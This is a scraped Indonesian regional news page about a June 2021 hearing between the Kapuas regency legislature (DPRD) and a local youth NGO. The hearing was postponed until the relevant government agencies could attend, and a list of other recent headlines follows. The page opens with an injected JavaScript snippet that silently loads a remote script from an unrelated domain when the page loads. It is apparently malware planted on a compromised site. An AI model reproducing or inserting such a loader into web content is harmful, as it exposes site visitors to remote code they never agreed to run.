(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

DPRD Kapuas RDP dengan LSM Forum Pemuda Reformasi


KANALKALIMANTAN.COM, KUALA KAPUAS – Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas menggelar Rapat Dengar Pendapat (RDP) dengan LSM Forum Pemuda Reformasi Kapuas, Senin (21/6/2021).

RDP berlangsung di ruang rapat gabungan komisi, dipimpin Ketua DPRD Kabupaten Kapuas, Ardiansah didampingi Sekretaris Komisi II DPRD, Darwandie dan anggota HM Rosehan Anwar dan Sekwan.

Hadir dalam RDP Ketua LSM Forum Pemuda Reformasi Kapuas, Maseran Mahmud bersama pengurus dan anggota.

“Sesuai surat dari LSM Forum Pemuda Reformasi Kapuas yang disampaikan ke DPRD Kapuas, jadi kami jadwalkan di RMrapat Banmus kemarin, sehingga hari ini kami adakan RDP dengan mereka,” kata Ardiansah Ketua DPRD Kapuas.

 

 

Ardiansah mengatakan untuk RDP, hasil kesepakatan dengan pihak LSM tersebut akan ditindaklanjuti dengan dijadwalkan kembali, karena SOPD terkait Pemkab Kapuas seharusnya hadir.

“Karena kurangnya informasi dan memahami apa yang ingin mereka sampaikan sehingga kami tidak undang SOPD terkait, jadi akan dijadwalkan di RDP selanjutnya,” ucap Ardiansah.

RDP disampaikan terkait hasil investigasi LSM Forum Pemuda Reformasi Kapuas terkait temuan atau persoalan di SOPD-SOPD yang ada supaya ke depan tidak terjadi kesalahan. (kanalkalimantan.com.ags)

Reporter: ags
Editor: kk


Al Ghifari

Recent Posts

Terselip Nama Aditya, PKB Keluarkan Rekomendasi 65 Calon Kepala Daerah

DPP PKB: Belum Ada Satu Rekomendasi Pun untuk Gubernur Read More

11 jam ago

Petani di HSU Dibekali Pelatihan Penggunaan Pestisida Terbatas

KANALKALIMANTAN.COM, AMUNTAI - Memanfaatkan herbisida aktif parakuat diklorida secara optimal dengan mengurangi dampak sekecil mungkin,… Read More

12 jam ago

BBPOM Gelar Bimtek Keamanan Pangan untuk Kader KPS Se-Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bimbingan Teknis (Bimtek) Keamanan Pangan untuk Kader Keamanan Pangan Sekolah (KPS) se-Kabupaten… Read More

13 jam ago

Hattrick PLN Raih Laba Bersih, Keuangan Terbaik Sepanjang Sejarah Perseroan

KANALKALIMANTAN.COM, JAKARTA - PT PLN (Persero) sukses membukukan keuntungan terbesar sepanjang sejarah perseroan dengan meraih… Read More

13 jam ago

Aeris Hotel Kadung Operasi, Wali Kota Banjarbaru Tak Akan Halangi Investasi

Catatan Dinas Terkait: Daya Tampung Parkir, Laik Sehat, Persetujuan Lingkungan, dan Limbah B3 Read More

15 jam ago

Ancar-ancar Poros Acil Odah-Rozanie di Pilgub Kalsel, Pesaing Muhidin-Hasnur

Rozanie Klaim Dapat Restu Surya Paloh saat Paman Birin ke Nasdem Tower Read More

16 jam ago

This website uses cookies.